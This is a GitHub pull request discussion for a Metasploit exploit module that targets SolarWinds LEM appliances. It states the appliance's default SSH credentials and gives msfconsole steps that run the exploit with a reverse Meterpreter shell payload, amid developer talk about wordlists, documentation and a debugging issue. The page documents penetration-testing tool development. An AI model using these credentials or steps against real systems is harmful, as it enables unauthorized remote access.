-
Notifications
You must be signed in to change notification settings - Fork 14.3k
Add module SolarWind LEM Default SSH Password Remote Code Execution #8126
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Conversation
Exploit works as advertised for me:
Looking into |
It would probably be more appropriate to write this as an auxiliary login scanner much like Although, not sure, since you have the additional steps where you "break out of the jail". |
@dmohanty-r7 I was planning go with |
@mmetince: Bro, you need to stop finding so many bugs. You're giving us too many modules. ;) |
I agree with @mmetince that having this as an exploit is perfectly fine. However, I would probably consider adding the default username and password to a wordlist in the data/wordlists directory, that way the ssh_login auxiliary can use it. I think this PR is probably good to land as soon as there is some module documentation. Nice work @mmetince & @dmohanty-r7 :-) |
Should I add these credential to the data/wordlists within this PR or should I send another PR ? @wchen-r7 I just need @dmohanty-r7 to solve |
@mmetince Either way works fine :-) Whatever is easier for you :-) |
Now I just want to know a root cause of |
I'm working on it with @dmohanty-r7. Got some leads. :) |
btw, docs look good to me. |
@mmetince We wrapped the |
🍰 |
Release NotesThe exploit/linux/ssh/solarwinds_lem_exec module has been added to the framework. It leverages the default SSH credentials of a SolarWind LEM appliance and uses command injection to break out of its defined |
This module exploits the default credentials of SolarWind LEM. A menu system is encountered when the SSH service is accessed with the default username and password which is "cmc" and "password". By exploiting a vulnerability that exist on the menuing script, an attacker can escape from restricted shell.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/ssh/solarwind_lem_exec
set RHOST <YOUR_TARGET>
python/meterpreter/reverse_tcp
is configured as a default payload. Change it if you need. Most of the case, you're okay go with default payload type.set LHOST <LOCAL IP>
exploit
and then verify the following output.session -i 1
and then verify the following output.Need backup!
Need your help in order to figure out why I'm getting
Exploit failed: Errno::EBADF Bad file descriptor
error even session is created. There is also way to escalate privileges to root but all the function that I am calling throughsession
such ascmd_exec
orsession.shell_command_token
is not working atdef on_new_session(session)